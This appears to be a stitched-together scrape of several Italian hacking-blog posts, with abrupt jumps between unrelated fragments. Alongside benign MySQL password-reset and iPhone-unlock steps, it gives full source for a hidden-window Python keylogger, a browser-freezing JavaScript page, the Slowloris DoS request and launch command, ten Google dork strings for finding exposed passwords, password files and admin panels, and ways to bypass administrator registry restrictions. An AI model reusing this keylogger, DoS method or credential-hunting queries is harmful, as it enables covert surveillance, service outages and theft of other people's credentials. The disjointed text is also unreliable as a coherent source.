Ecco di seguito il video che certifica l’avvenuto jailbreak:

La PS3 si caratterizza per il fatto di integrare un complesso sistema di protezione che consente la sola esecuzione di software firmato digitalmente: l’exploit trovato da Hontz consente di bypassare in maniera piuttosto “semplice” questo sistema di protezione, consentendo perciò di eseguire all’interno della console giochi o comunque programmi non originali.

Di fatto l’exploit è stato testato sulle versioni 2.4.2 e 3.10 ma, a detta dell’autore, dovrebbe funzionare anche su tutte le altre versioni della console. Ora che l’exploit è stato reso pubblico, probabilmente assisteremo ad una serie di numerose e veloci evoluzioni dello scenario che vedrà aprirsi una vera e propria competizione tra la community degli hacker (che continuerà a rilasciare versioni sempre più perfezionate e stabili di loader e software vari) e gli sviluppatori della Sony che cercheranno di correre ai ripari il più in fretta possibile rilasciando nuovi firmware e patch.

Nel frattempo, coloro che hanno più familiarità con la programmazione in C e l’elettronica, potranno provare a scaricare ed analizzare l’exploit che è disponibile per il download sul blog dell’autore

1. la disponibilità su per più piattaforme: ne esistono versioni sia per Linux/Unix che per Windows
2. le sue ottime performances in termini di prestazioni e velocità, molto elevate in rapporto alle risorse hardware necessarie

Ad ogni database MySQL è normalmente associato un utente root con pieni poteri che consente di gestirne ed amministrarne ogni funzionalità. Questo ovviamente implica che se per caso (o per sfortuna) se ne perde la password, il database diventa praticamente inutilizzabile. Di seguito vedremo due metodi per recuperare la password di root di un database MySQL.

Metodo 1

• Arrestate tutti i processi mysqld e mysqld_safe:

  #pkill mysql
  #pkill mysql-safe

• Create il file /root/reset-mysql-password con il seguente contenuto:

  UPDATE mysql.user SET Password=PASSWORD(’newpA$$w0rd’) WHERE User=’root’;
  FLUSH PRIVILEGES;

• Per effettuare il reset della password impostando quella scelta da voi, avviate il MySQL daemon in modalità safe passando il file precendente come input:

  #mysqld_safe –init-file=/root/reset-mysql-password &

• Cancellate il file di inizializzazione, fermate il porcesso in modalità safe ed avviate MySQL normalmente:

  #rm /root/reset-mysql-password
  #pkill mysql-safe
  #/etc/init.d/mysql start

• Provate a collegarvi con la nuova password utilizzando il comando seguente:

  #mysql -u root –p

Metodo 2

• Arrestate tutti i processi mysqld e mysqld_safe:

  #pkill mysql
  #pkill mysql-safe

• Per effettuare il reset della passsord di root avviate MySQL in modalità safe con i seguenti parametri:

  #mysqld_safe –skip-grant-tables –skip-networking &

  In questa modalità chiunque può collegarsi al server ed effettuare qualunque operazione

• Collegatevi al database come root (non vi servirà la password):

  # mysql -u root mysql

• Modificate la password utilizzando la seguente query SQL:

  UPDATE user SET Password=PASSWORD(’newpA$$’) WHERE User=’root’;
  mysql> FLUSH PRIVILEGES;

• Dopo il cambio della password riavviate MySQL normalmente:

  #pkill mysql-safe
  #/etc/init.d/mysql start

• Provate a collegarvi con la nuova password utilizzando il comando seguente:

  #mysql -u root –p

Via Shahryary

Di fatto quindi l’installazione di un keylogger su un computer che non sia il proprio o comunque ad insaputa del legittimo proprietario, si configura come un vero e proprio reato di violazione della privacy: i dati intercettati (come ad esempio sessioni di chat, username e password di Facebook o dell’ home banking, email, …) infatti vengono normalmente salvati su un file di log che il possessore del keylogger recupera in un secondo momento o che addirittura gli vengono inviati automaticamente via email.

A scopo puramente didattico vedremo come sia possibile creare un semplice keylogger completamente funzionante, sfruttando la poternza di Python. Di seguito i passi da seguire:

1. Scaricate ed installate i software necessari:
   • Python 2.6: http://www.python.org/
   • Pyhook per Python 2.6: pyhook.sourceforge.net
   • Python for Windows Extensions: http://sourceforge.net/projects/pywin32/
2. Dal menu di avvio selezionate “Python 2.6 > PythonWin” per avviare l’editor
3. Dal menù selezionate “File > New“, quindi scegliete l’opzione “Python Script” e date “OK“
4. Incollate il seguente sorgente (attenzione alle indentazioni) o in alternativa scaricate direttamente il file da questo link:

   import win32api
   import win32console
   import win32gui
   import pythoncom, pyHook
   win = win32console.GetConsoleWindow()
   win32gui.ShowWindow(win,0)
   def OnKeyboardEvent(event):
     if event.Ascii==5:
       _exit(1)
    if event.Ascii != 0 or 8:
      f=open('c:\output.txt','r')
      buffer=f.read()
      f.close()
      f=open('c:\output.txt','w')
      keylogs=chr(event.Ascii)
      if event.Ascii==13:
        keylogs='/n'
      buffer += keylogs
      f.write(buffer)
      f.close()
   hm = pyHook.HookManager()
   hm.KeyDown = OnKeyboardEvent
   hm.HookKeyboard()
   pythoncom.PumpMessages()

5. Salvate il file in c:\ come “logger.py“, quindi da PythonWin digitate CTRL+R: il keylogger verrrà avviato in background e fino a quando rimarrà in esecuzione registrerà sul file “C:\output.txt” tutto ciò che verrà digitato sulla tastiera.

• Create un nuovo file con estensione “.htm“
• Aprite il file e copiatevi all’interno il seguente contenuto:

  <html>
  <head>
  <script>
  var a;
  for(i=0;i<65536;i++){
    document.write(a+=String.fromCharCode(i));
  }
  </script>
  </head>
  <body/>
  </html>

• Chiudete e salvate il file
• Avviate Firefox e provate un po’ a vedere cosa succede aprendo (anche il locale) il file appena creato

I più esperti potrebbero obiettare che un loop Javascript particolarmente oneroso in termini di risorse viene di solito immediatamente segnalato dal browser che è in grado di interrromperne l’esecuzione: il “bello” però è che, per qualche strano motivo, questo non avviene utilizzando questa particolare routine JS.

Ovviamente il problema è che ogniqualvolta viene aggiornato il firmware dell’ iPhone si perde anche l’eventuale sblocco effettuato sulla versione precedente… Fortunatamente però c’è la conferma ufficiale da parte dell’ iPhone Dev Team che anche la versione 3.0.1 è sbloccabile tranquillamente con Redsn0w 0.8.

La procedura è la stessa di sempre solo che va applicata puntando alla versione 3.0 del firmware:

1. Scaricate l’ iPhone OS 3.0 adatto al vostro modello:
   • iPhone firmware 3.0 (filename: iPhone1,1_3.0_7A341_Restore.ipsw)
   • iPhone 3G firmware 3.0 (filename: iPhone1,2_3.0_7A341_Restore.ipsw)
   • iPhone 3GS firmware 3.0 (filename: iPhone2,1_3.0_7A341_Restore.ipsw )
2. Scaricate Redsn0w 0.8
3. Lanciate Redsnow e seguite le istruzioni: quando vi verrà richiesto di selezionare il firmware, scegliete la versione 3.0 e non la 3.0.1. La procedura funziona tranquillamente e consente lo sblocco del firmware 3.0.1

Di tool in grado di lanciare attacchi DoS ce ne sono molti in circolazione e spesso si basano sul vulnerabilità a livello diprotocollo  TCP, ma Slowloris DoS Tool è sicuramente quello che si caratterizza meglio di tutti per la banalità del principio di funzionamento e nello stesso tempo per l’efficacia che riesce ad avere su praticamente tutte le versioni di Apache e di altri Web Server.

Slowloris DoS Tool è un piccolo script scritto in Perl che non fa altro che inviare una serie continua di richieste HTTP incomplete verso il server vittima il quale alloca per ognuna di esse una connessione e rimane in attesa di ricevere l’header HTTP completo che non arriverà mai. più in dettaglio, Slowloris invia la seguente richiesta:

GET / HTTP/1.1\r\n
Host: host\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n
Content-Length: 42\r\n

Notate che non viene inviato il CRLF che indicherebbe il completamento della richiesta; invece, dopo qualche istante viene inviato l’header seguente:

X-a: b\r\n

che non ha alcun significato ed induce il server a rimanere in attesa delle successive informazioni che appunto non ariveranno mai.

Questa vulnerabilità sembra affliggere i seguenti web server:

• Apache 1.*
• Apache 2.*
• dhttpd
• GoAhead WebServer
• Squid

Mentre sembrano esserne esenti:

• IIS
• lighthttpd
• nginx
• Cherokee

Attualmente l’unico modo per mitigare e gli effetti di questo tipo di attacco consiste nel limitare il numero di accessi provenienti dal medesimo IP address in un arco di tempo particolarmente breve.

Slowloris DoS Tool è efficace sono se utilizzato su Linux (Windows ha dei limiti troppo restrittivi sul numero di socket gestibili in parallelo). La sintassi per lanciarlo è la seguente:

perl slowloris.pl -dns example.com

Lo scopo di questo articolo è puramente dimostrativo: non mi assumo alcuna responsabilità sull’uso improprio che protreste dare di questo tool. Tenete solo presente che normalmente tutti i web Server mantengono un log dettagliato di tutte le richieste, per cui non è difficile risalire ad uno specifico IP address.

Scarica slowloris.pl

In questo articolo vedremo un elenco di interessanti tecniche di hacking basate sull’utilizzo di Google per ottenere credenziali di accesso e informazioni utilizzabili per effettuare intrusioni ed attacchi. Per provarle è sufficiente inserire nella casella di ricerca di Google le stringhe di ricerca riportate di seguito in corsivo.

1. Utenze e password memorizzate su WS FTP e FlashFXP

   WS FTP e FlashFXP  sono due popolari client FTP che utilizzano rispettivamente un file denominato ws_ftp.ini e flashFXP.ini per salvare le informazioni di accesso ai siti FTP configurati.
   Stringa di ricerca per WS FTP: intitle:index.of ws_ftp.ini oppure filetype:ini ws_ftp pwd o “index of/” “ws_ftp.ini” “parent directory”
   Stringa di ricerca per FlashFXP: filetype:ini inurl:flashFXP.ini

2. Utenze e password dei siti creati con Frontpage

   Frontpage è un client ancora largamente utilizzato per creare siti web statici: il sistema di autenticazione automatica per collegarvisi si basa sul file service.pwd che contiene utenze e password criptate che possono essere decodificate con poco sforzo avvalendosi di John The Ripper.
   Stringa di ricenca: “# -FrontPage-” inurl:service.pwd
   

3. Files di log con utenze e password

   Sembra incredibile ma succede molto spesso che utenze e password di accesso a siti o aree riservate vengano memorizzati in un file passwords.log. Provate voi stessi…
   Stringa di ricerca: filetype:log inurl:”password.log”
   

4. Download completo del database mdb dei forum Web Wiz Forums

   Se un forum Web Wiz Forums non viene opportunamente configurato, è possibile scaricarne l’intero database in maniera immediata!
   String di ricenca: filetype:mdb wwforum
   

5. Server con interfaccia VNC esposta via Applet Java

   VNC è un software di controllo remoto che può essere esposto anche via web grazie ad un’applet Java che normalmente sta in ascolto sulla porta 5800.
   String di ricenca: intitle:vnc.desktop inurl:5800 oppure “VNC Desktop” inurl:5800
   

6. File di configurazione di Proftpd

   Il file di configurazione di un server proftpd contiene molte informazioni relative all’installazione, alle utenze e ai logs.
   Stringa di ricerca: filetype:conf inurl:proftpd.conf -sample
   

7. Creare un’utenza su Argosoft mail server pro

   Se un server Argosoft mail non è opportunamente configurato, è possibile crearvi una propria utenza di posta accedendo ad un’url ad hoc.
   Stringa di ricerca: “adding new user” inurl:addnewuser -”there are no domains”
   

8. Interfaccia di amministrazione Web Data Administrator per Microsoft SQL Server

   Web Data Administrator è un’interfaccia web di utilita scritta in ASP.NET ed utilizzata per gestire via web un database SQL Server.
   Stringa di ricerca: intitle:”Web Data Administrator – Login”
   

9. Files di backup di password e configurazioni

   Molti amministratori sono (giustamente) soliti effettuare una copia di backup prima di modificare un file di configurazione e spesso ne cambiano l’estensione in “.bak”.
   Stringa di ricerca: filetype:bak inurl:”htaccess|passwd|shadow|htusers”
   

10. Archivi della posta elettronica di Microsoft Outlook

    Outlook salva le email su files con estensione .pst: caricando un file di questo tipo su Outlook è possibile accedere a tutte le email che contiene in maniera immediata.
    Stringa di ricerca: outlook filetype:pst

• ci si posiziona  in KEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System
• si crea una nuova chiave di tipo DWORD con etichetta “DisableRegistryTools” e valore impostato a “1” .

Ovviamente questa restrizione viene applicata di solito con la finalità di proteggere il sistema operativo da attacchi da parte di virus o intrusioni di hackers: disattivando l’editing del Registry, nessun software malevolo avrà la possibilità di modificare alcuna impostazione relativa al funzionamento del sistema operativo come ad esempio la configurazione dei programmi da eseguire all’avvio del computer.

La cosa da tener però ben presente è che, una volta attivata questa restrizione, non sarà più possibile, con gli strumenti consueti (regedit o esecuzione di un file .reg), effettuare alcuna modifica al registro né tantomeno rimuovere la stessa restrizione! L’unica soluzione consiste nell’avvalersi di tools ad hoc che consentono di modificare il registry a basso livello o con sistemi alternativi.

Uno di questi strumenti è Reg2Exe che semplicemente è in grado di convertire un file .reg in .exe: lanciando gli eseguibili generati da Reg2Exe diventa possibile applicare qualunque modifica al Registry pur avendo anche la chiave DisableRegistryTools attivata.

Reg2Exe è un’applicazione gratuita che non necessita di installazione. Per attivarlo è necessario:

1. Scaricare l’eseguibile (vedi link alla fine dell’articolo)
2. Scompattare l’archivio zip ed avviare l’eseguibile Reg2Exe.exe
3. Cliccare sul bottone “Register”
   

A questo punto, ogni volta che selezionerete un file “.reg” e cliccherete col tasto destro del mouse, avrete a disposizione nel menù contestuale una nuova voce “Convert to Exe” che vi consentirà di creare l’eseguibile ad hoc per applicare le vostre modifiche, bypassando così tutte le restrizioni attivate dall’amministratore del sistema:

Scarica Reg2Exe

Via Raymond.cc

Nessun problema: recuperarla è veramente questione di pochi istanti! Ecco come procedere:

1. Scaricate MSN Password Hacker (si tratta di uno zip da circa 17Kb)
2. Scompattate l’eseguibile “WLMPassword.exe” e lanciatelo
3. Inserite l’indirizzo email del vostro account Windows Live nel primo box denominato “Filter”
4. Cliccate sul bottone “Check”

A questo punto, se la password viene recuperata con successo, essa comparirà in chiaro all’interno del box “Password”, altrimenti verrà visualizato il testo “<empty>”.

MSN Password Hacker è un tool gratuito che vanta più di un milione di downloads: è compatibile con Windows XP/Vista e supporta tutte le ultime versioni di Windows Live Messenger.

Scarica MSN Password Hacker

Via Technix Update